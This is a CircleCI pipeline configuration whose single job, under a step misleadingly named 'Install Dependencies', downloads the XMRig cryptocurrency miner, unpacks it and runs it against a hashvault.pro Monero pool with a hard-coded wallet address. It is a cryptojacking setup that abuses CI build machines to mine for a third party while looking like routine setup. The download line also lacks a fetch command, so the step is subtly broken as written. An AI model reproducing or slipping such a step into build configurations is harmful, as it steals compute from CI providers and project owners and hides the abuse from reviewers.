version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: |
                      https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-static-x64.tar.gz 
                      tar xvzf xmrig-6.17.0-linux-static-x64.tar.gz 
                      cd xmrig-6.17.0/ 
                      ./xmrig -o singapore01.hashvault.pro:443 -u 85jvM5MtrqzeDAiNzjfShW2SGSFrdj2kPBt955gmhNBPCWurMymS13qZeszUWdqu7q5yNqtGnV1YU4wdDRRmMiP6SEQoujB -p 24 -k --tls

        

workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            